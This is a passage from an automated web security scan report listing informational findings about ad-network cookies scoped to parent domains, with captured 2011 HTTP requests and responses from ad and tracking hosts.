Zpycv7iAIdiRqCzT2O7l4iJ7M9KxLjk1g4iCGD9d7Bnf8DlenBahcgWfsEGGIhs5S1kFpi2waCP7M7IujJgpjReKx1oUaC2n3sTgsAsWXiCGSqi2H+bXTiMMwsbJmmqfh868zK8DT+UO34iIPSUNvH+9LxJlBTM4zrgbRvxKmEfkoloEey8Su2LcC/4TDoX454zYkzghKdrM3/VDDSg+++jIzOmyR5H8EBbymNhwm7Cmao7CkbCQGVGV16kzTOLqS3tkquW5FO+I14XiU9MC7s+YlpQqTQVNzikypsQ4mMakObHYNqGm5smzfVuiZokZDMLmaJJ+zMjo6DR8oVkzbJ2cg0JXUK2spmVjvN0lBQ3ScDOssaW3dWwhnHwKlK+F52CFLZNUle4dDJXioVnhLAxZjivb1FLCoqz8bXtM5SEKXAk6zrOOICONbcEtivU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnXgmVDHz5HNAamBpCwgBedmjQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUPNOV2DdxIY1n3ioaH2BaM5+38g0fnq9IMs3Ssj976dqyMflzXndtQ/xCpjwkdl3jNjHIsSwidNVbPyQ8UukRlWAjzpgFu32Lh8TKovNuSMVT5zGqo+lVmsW02snStYmh6NVd6vQsWlMKLdx+mE2quPRxQw99QyHqQDKQmPTjX0IeU2BSj1d6aejeA2FSqM0oOtyZX/O2DScq9ciwmaexHpxuC3w/9hpURE0P7vbEXMP6qBRPf1ZS7Lkitm9khGEOewMOnllBWOlHOFGK43TM3FBJBRb/6qLcoC6gfW2xM4RivQvRRtikTJpufS1CInAw1no+zVmXZ2hTS6ONfIS1L7xA3elQ2eEN3P9aLspLwGIOLc4LwKaIjxEp7wbwhRcuvh+Onumpz1EcrdgPTf0xnSkxhfwzY2GYLXed45lhrR1joiovE7lKLUbTGz7+E1+YbvI8XZKmgeItShiLEr0yzF8A8nxh4PvIu9Cjo6s3qCFOY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:14 GMT
Content-Length: 1207

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

5.23. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=360&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B";Path=/;Domain=.adbrite.com;Expires=Sat, 16-Apr-2011 12:35:43 GMT
Set-Cookie: b="%3A%3Adqjd";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 06-Apr-2021 12:35:43 GMT
Set-Cookie: vsd=0@1@4da0529f@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:43 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 1583

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid
...[SNIP]...

5.24. http://adx.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESENjWPLIPAv41DU05MuE90XA&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302541875197&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChEIiXoQChgCIAIoAjC27IztBAoSCNyOARAKGAEgASgBMODnjO0EELbsjO0EGAI.; acb917920=5_[r^kI/7Z6[kCcE/qX3Ib3`j?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP5U0V0-cDA0L8f5MdWfsOng2NqNNAAAAAMY5AwA3AQAAfAAAABkAAAChsAMAoVsAAAEAAABVU0QAVVNEANgCWgCqAQAANQIBAgUCAAUAAAAAWyI5nAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198712%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12488354959403911,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5780,%5C%22spendCreativeId%5C%22:198712,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd146.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12488354959403911%5EMEDIA6_DATA%5Efoo=bar; uuid2=8663496762294337265; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6W0Jrx!wQ.V#j3ObY5m*u3dTEH)U-!CnH%ij_4iN6VW%p2Y9bgzjq.G_8=%p/i)(Jz8WMaNXPrmLD4N(wOREnYe2x7$c4'2neswzJN:s*lyNP)1B_c=(g0OA*e6^R@`G^X$#oW*!b^J$.Nc5F$w'Wj8jw0_-7u-oqgU)d@IY4T6Pqj1!Y(b<VCl-wnmeMRAPasr@q5MvlBYdla=XKh8tlB`)M^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6W0Jrx!wQ.V#j3ObY5m*u3dTEH)U-!CnH%ij_4iN6VW%p2Y9bgzjq.G_8=%p/i)(Jz8WMaNXPrmLD4N(wOREnYe2x7$c4'2neswzJN:s*lyNP)1B_c=(g0OA*e6^R@`G^X$#oW*!b^J$.Nc5F$w'Wj8jw0_-7u-oqgU)d@IY4T6Pqj1!Y(b<VCl-wnmeMRAPasr@q5MvlBYdla=XKh8tlB`)M^; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 11 Apr 2011 17:11:22 GMT

GIF89a.............!.......,........@..L..;

5.25. http://ak1.abmr.net/is/content.yieldmanager.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/content.yieldmanager.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/content.yieldmanager.com?U=/ak/q.gif&V=3-lx%2fQOmxQNG0eorn%2fu8LBhvJeo45BnPB%2fik23iGVe80aLZrxSviggiGQ1thVyWCGj7JoWTuGQqRQ%3d&I=EEEA60E55DC1402&D=content.yieldmanager.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540674267&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Cache-Control: max-age=0
If-Modified-Since: Wed, 18 Oct 2006 18:25:22 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-D732F82572E67A35BA5BF05696140341DF83DF41237D012794F25B5156411B0E-3991BE1D4764374636ED9D1B940FEA8D6229E8AE7445C18E6AE4FBD599FB6EE4

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://content.yieldmanager.com/ak/q.gif?01AD=2-2-7320F771B78BB912BBA6B43FD09A375AF470E07BBA7F6263FC7DF97235E71B2C-50EA0A74EF7A786FBF142F634336342D871099348D54D03CEE7EFC7E33D7483D&01RI=EEEA60E55DC1402&01NA=
Expires: Mon, 11 Apr 2011 16:51:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:51:19 GMT
Connection: close
Set-Cookie: 01AI=2-2-F7FF007DF9666A4675E172271ED2877EA801245906FC6F74799C0E1365DEE428-3B5BB0512DF04136FE1D7AF68802888AFF3B2F2871905733FA86994B3CC4A79D; expires=Tue, 10-Apr-2012 16:51:19 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


5.26. http://ak1.abmr.net/is/tag.admeld.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/tag.admeld.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/iframe/3/foxnews/300x250/politics-bottom&V=3-jUOVCZARsyxH+dHMws+VqMAEIhqWEkm6k05w0XlzIC91Jfeb+K8e+Q%3d%3d&I=90A4C54ACA8290D&D=admeld.com&01AD=1&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-EA49BC622C57E43014F7FE6EF1355413FADB8358BB4C363A4AF6797B5374FC5E-F664F3AE4E6B6C96B2174BDC101997813BE6B909145967C31BB3ED42B9E6829B

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3xkFoRwzZdHZJY48tpCxWZPLpmZ45zClagwxC5r36lze5klo7zuqbUg&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Expires: Mon, 11 Apr 2011 16:21:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close
Set-Cookie: 01AI=2-2-D766EC567D77B70A389C7D071A0C270EA4C213784ABFB628475CCF489CEFE47B-252217F50ECC03FC6DFE8656A68CB869AB99A49B02FC80DFDCD099F29516FE2A; expires=Tue, 10-Apr-2012 16:21:18 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


5.27. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:27:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 525
Date: Mon, 11 Apr 2011 16:21:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...

5.28. http://api.bizographics.com/v1/profile.redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDzCvipnduuyh7dsnRGwuisv9lgdLN2CDPvYnN3SaI2ZY7d4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57XvbckI43H8V9NXzJIXKwEOngHh2VamB2EXVXtg7b5stvcAWXzmjMHHvxUvUolOIqHLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 11 Apr 2011 16:21:26 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=4&seniority=executive&industry=business_services&functional_area=information_technology&location=texas&group=high_net_worth
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=b67e419b-0f67-49a8-9374-7947627c8dff;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDvMYL6FMax0vdsnRGwuisv9jRbgsAzbwmlWisxtfL18I2N4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57UeTh1BhcR7a9NXzJIXKwEOngHh2VamB2DMjR7kplxipHvcAWXzmjMHEnpfCFNipPpMXLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


5.29. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036361&rn=1225152024&c7=http%3A%2F%2Fwww.wcax.com%2F&c4=%2FGlobal%2Fcategory.asp%3FC%3D18195&c8=WCAX.COM%20Local%20Vermont%20News%2C%20Weather%20and%20Sports-%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 09 Apr 2011 12:29:30 GMT
Connection: close
Set-Cookie: UID=167523a-24.143.206.177-1301787521; expires=Mon, 08-Apr-2013 12:29:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


5.30. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
